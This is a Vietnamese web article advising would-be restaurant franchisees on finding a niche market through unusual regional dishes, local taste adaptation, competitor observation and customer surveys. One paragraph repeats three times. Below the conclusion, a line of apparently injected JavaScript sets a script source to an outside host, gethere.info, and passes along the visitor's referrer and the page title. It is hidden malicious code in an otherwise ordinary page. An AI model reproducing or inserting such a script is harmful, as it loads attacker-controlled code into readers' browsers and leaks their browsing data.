Làm thế nào để tìm ra được thị trường ngách trong quá trình thâm nhập vào cộng đồng thương mại nhượng quyền

Thông thường một sản phẩm hay một doanh nghiệp thu hút được nhiều khách hàng là do chất lượng, uy tín và mẫu mã của họ. Tuy nhiên, trong thời đại kinh tế thị trường, mọi doanh nghiệp đều nỗ lực để làm hài lòng khách hàng, đặc biệt trong thị trường nhượng quyền thương mại, thì các yếu tố về sản phẩm, mặt bằng, marketing, thương hiệu hầu hết đều không có sự khác biệt.

Niche-Market

Do đó, giờ đây để thu hút khách hàng, bạn buộc phải trở nên đặc biệt. Theo nghiên cứu chỉ ra thì sự mới lạ luôn là điều thu hút những người xung quanh một cách tốt nhất. Thực tế thì nó không chỉ bởi sở thích của con người là đam mê cái mới, theo đuổi cái lạ, mà còn phục vụ rất nhiều lợi ích khác của họ,theo những phương thức khác nhau phù hợp với những địa điểm khác nhau. Ví dụ như, thị trường ngách sẽ giúp khách hàng không phải tò mò về một sản phẩm cụ thề nào đó ( và tất nhiên đây cũng là lý do họ sẽ mua và thưởng thức nó), cũng như không phải đi xa hay thậm chí chỉ vài dịp du lịch mới có thể cảm nhận. Do đó, nếu có một sản phẩm độc, lạ, bạn sẽ thành công trong việc thu hút toàn bộ khách hàng xung quanh khu vực đó.

Nhưng có lẽ, quan trọng nhất, phải kể đến chính là với thị trường ngách bạn sẽ không phải bận tâm đến vấn đề đối thủ cạnh tranh. Sẽ không có bất cứ ai dùng mọi thủ đoạn, phương pháp marketing để cạnh tranh, thu hút, lôi kéo khách hàng bằng những chiêu trò, mức giá thấp hay thế lực nào khác. Không ai. Do đó nếu một nhóm người muốn tìm kiếm loại hình thực phẩm đặc biệt nào đó mà chỉ có nhà hàng bạn có được, thì chắc chắn họ sẽ tìm đến nhà hàng bạn, thay vì lái xe rất nhiều cây số tới một nơi khác.

micro_niche_group

Nghe có vẻ thực sự hấp dẫn phải không? Đúng, sức hút của việc tìm ra thị trường ngách là điều khó có thể cưỡng lại. Vậy làm thế nào để đạt được nó? Làm sao để tìm ra cách thành lập một mô hình hấp dẫn đến vậy? Làm thế nào có thể tìm ra một ngách nhỏ trong thị trường to lớn, nơi mà không có bất kỳ sự cạnh tranh nào và hầu như nắm giữ sự độc quyền? Bài viết này sẽ chỉ ra cho bạn: đó chính là tìm đúng loại hình thương hiệu đáp ứng mọi tiêu chí từ phong tục, thói quen, mật độ dân cư cũng như mức thu nhập của cộng đồng đó.

Việc đầu tiên cần làm chính là nhìn lại một lượt những gì mà các chuỗi thức ăn nhượng quyền hiện nay đang có được. Các cơ hội tìm hiểu sâu rộng sẽ đến từ những chuỗi nhà hàng pizza, tập hợp các nhà hàng phục vụ món ăn Mexico hay địa điểm bán burger hơn là cố gắng tìm hiểu qua những ứng dụng, fanpage đơn lẻ, riêng biệt. (Nếu bạn chưa từng nghĩ tới điều này, thì đây chính là cơ hội cho bạn tránh xa các sai lầm và lấp đầy những lỗ hổng).

Nhà hàng của bạn rất có thể sẽ thành công, nhưng những đối thủ cạnh tranh cũng vậy. Tất nhiên, mọi người chơi đều phải chuẩn bị đầy đủ và có những xuất phát điểm như nhau: từ chi phí quảng cáo cao ngất, nguồn cung khách hàng và vốn đầu tư – ít nhất cho một khoảng thời gian dài. Nếu chỉ cần một trong những điều kiện trên chưa đủ, thì chắc chắn bạn sẽ là người thua cuộc. Nói cách khách rất có thể mô hình kinh doanh của bạn có thể thành công vào thời điểm hiện tại, nhưng với một thị trường đang ngày một bão hòa, thì thu nhập hay sự thành công đó có thể vuột mất bất cứ lúc nào. Điều bạn có thể làm chỉ là không ngừng tìm kiếm, không ngừng nỗ lực, không ngừng thay đổi thị trường ngách của mình, sao cho nó có thể đạt được hiệu quả tốt nhất.

niche_market

Cách thức tìm đúng thị trường nhượng quyền thương hiệu ngách

Thay vì tìm kiếm những cơ hội an toàn theo số đông hay những lựa chọn bình thường khác, hãy bắt tay vào tìm kiếm những mô hình trước đây chưa từng có, hoặc rất ít, rải rác ở vài địa điểm cách xa nhau hàng trăm nghìn kilomet. Đó có thể là bữa tráng miệng theo phong cách Châu Âu hay đặc sản địa phương của một vùng miền hoang dã, thứ mà xung quanh nơi đó, lãnh thổ hay đất nước đó cảm thấy đặc biệt.

Thay vì tìm kiếm những cơ hội an toàn theo số đông hay những lựa chọn bình thường khác, hãy bắt tay vào tìm kiếm những mô hình trước đây chưa từng có, hoặc rất ít, rải rác ở vài địa điểm cách xa nhau hàng trăm nghìn kilomet.

Thay vì tìm kiếm những cơ hội an toàn theo số đông hay những lựa chọn bình thường khác, hãy bắt tay vào tìm kiếm những mô hình trước đây chưa từng có, hoặc rất ít, rải rác ở vài địa điểm cách xa nhau hàng trăm nghìn kilomet.

Đôi khi có thể chỉ rất đơn giản là một loại bánh mỳ hay burger ăn kèm bữa sáng hay một loại thức ăn nhanh ăn nhẹ bữa chiều. Dù nó là gì đi chăng nữa, thì nó phải độc đáo, khác lạ ở dịa phương đó, và dĩ nhiên phải ngon.

Tuy nhiên quá trình này cũng khá mạo hiểm, bởi vì nó là đặc sản, nê  trừ khi bạn chính là người gốc của vùng miền đó, đến lập nghiệp tại một vùng đất khác, nếu không thì cần chắc chắn công thức món ăn đó dễ học và có được hương vị nguyên bản, thậm chí hấp dẫn hơn. Mục tiêu là phải tìm ra sản phẩm ngon nhất, tốn ít thời gian chế biến nhất, đáp ứng được nguyên liệu sẵ có và đặc biệt là cần điều chình một chút cho phù hợp với vùng miền. Ví dụ như có vùng ăn cay, mặn, chua hay ngọt, cùng một công thức nấu ăn nhưng cần nêm nếm gia vị sao cho phù hợp khẩu vị người dân nơi đây. Cố gắng tìm ra và loại bỏ những món ăn với hương vị hay công thức đòi hỏi quá nhiều kỹ thuật và thời gian. Bởi như vậy sẽ khá mạo hiểm, vì chưa chắc bản thân chủ nhà hàng có thể tạo ra đúng hương vị đó hay truyền dạy cách làm cho những đầu bếp khác.

Franchises

Khi nhìn vào thương hiệu, hãy nhìn những gì mà họ đạt được trong suốt bề dày lịch sử cũng như cần những trải nghiệm thực tế. Bằng cách đi khảo sát thực tế, bạn hãy đặt một bữa trưa tại một thương hiệu bất kỳ và quan sát xem họ bận rộn như thế nào vào mỗi thứ 3 ( thời điểm các nhà hàng vắng khách nhất vì là đầu tuần và vào ngày thường) sau đó so sánh mức độ bận rộn và cách thức xử lý công việc của cùng nhà hàng đó vào bữa sáng hay tối thứ bảy. Bằng cách nhìn vào mật độ khách hàng như vậy, bạn sẽ có những ý tưởng cũng như hình dung nhất định về kế hoạch kinh doanh của mình, tưởng tượng xem hình thức đó có phù hợp với khu vực bạn định thành lập nhà hàng không.

Cuối cùng, nếu vẫn bế tắc, chưa tìm ra mô hình kinh doanh hay thực phẩm thích hợp để cung cấp, hãy làm khảo sát trực tiếp đặt câu hỏi tới khách hàng, hỏi họ muốn gì và công việc của bạn chỉ là đáp ứng mong muốn đó. Hỏi xem họ muốn có loại thực phẩm nào hay món ăn, kiểu nhà hàng nào địa phương đó còn thiếu và biến nó thành sự thật. Bạn nên tập trung vào những nhóm bạn hay gặp gỡ, trò chuyện với một tập thể, trường, lớp, khu chung cư nào đó để đơn giản hóa quá trình lọc và phân tích số liệu khảo sát. Sau cùng, cách tốt nhất để tìm ra những khách hàng tiềm năng nhất hãy ra ngoài và nói chuyện thực tế với những khách hàng thường xuyên ghé thăm các quán ăn xung quanh địa phương đó.

Bằng kết quả của cuộc khảo sát đó,và hàng trăm khách hàng đầy tiềm năng khác – con đường dẫn đến thành công và tìm ra một nhà hàng nhượng quyền độc đáo chỉ còn là vấn đề thời gian.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Thảo luận

Bình luận

Trang 1 trên 11